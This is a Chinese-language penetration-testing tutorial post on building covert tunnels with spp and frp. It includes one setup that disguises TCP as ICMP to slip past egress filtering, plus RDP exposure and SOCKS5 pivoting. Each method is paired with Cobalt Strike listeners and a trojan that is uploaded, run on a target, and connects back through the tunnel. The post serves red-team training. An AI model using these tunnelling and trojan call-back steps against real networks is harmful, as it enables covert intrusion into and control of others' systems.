内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术

2024-06-05 581 0

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

spp隧道代理工具

支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图1

客户端配置
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图2

服务端可进行查看连接状态

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图3

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图4

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图5

生成木马

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图6

将木马上传到目标主机当中,执行即可。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图7

成功上线

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图8

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图9

spp服务端代理状态:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图10

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图11

客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图12

服务端状态,成功建立隧道

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图13

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图14

生成另一个监听器,监听本地的IP地址的6666端口即可。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图15

监听器状态:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图16

生成木马,执行上线。

选择本地监听器,生成木马即可。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图17

将木马上传到目标机器,执行木马

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图18

执行木马,成功上线

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图19

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图20

ICMP流量

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图21

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

frp内网穿透

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCPUDP,以及 HTTPHTTPS协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。

项目地址:fatedier/frp

对应下载即可

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图22

内网穿透上线

frp配置

服务端配置,修改frps.ini配置文件,简单配置

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图23

客户端配置

[common]
server_addr = 服务器ip
server_port = 8080	#连接端口

[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图24

服务端开启。客户端开启。观察状态,成功建立连接。

客户端开启,向服务器建立连接。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图25

服务端状态,成功建立连接。

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图26

CS上线

客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。

生成木马的监听器配置:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图27

接受shell的监听器配置:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图28

生成木马,上传到目标机器当中,执行,成功上线

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图29

上传到目标机,并执行木马

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图30

成功上线

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图31

配置RDP远程桌面连接内网主机

服务端简单配置不变,开启frp服务

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图32

客户端在目标机上执行,配置文件修改

[common]
server_addr = 服务器ip
server_port = 8080

[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图33

开启客户端服务,服务端查看状态,成功建立连接

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图34

服务端状态

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图35

远程桌面连接:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图36

成功连接

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图37

socks5代理转发

通过代理转发,实现访问内网web服务

客户端配置:

[socks5]                
type = tcp              
remote_port = 8081
plugin = socks5

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图38

客户端执行即可

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图39

服务端状态:

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图40

通过代理软件或浏览器代理插件配置代理,可访问内网服务

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图41

访问内网web服务

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术插图42

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

应急响应沟通准备与技术梳理(Windows篇)
API安全 | GraphQL API漏洞一览
BUUCTF | reverse wp(一)
Linux基线加固:Linux基线检查及安全加固手工实操
揭秘Gamaredon APT的精准攻击:针对乌克兰调查局的网络钓鱼与多阶段攻击
特定版本Vaadin组件反序列化漏洞

发布评论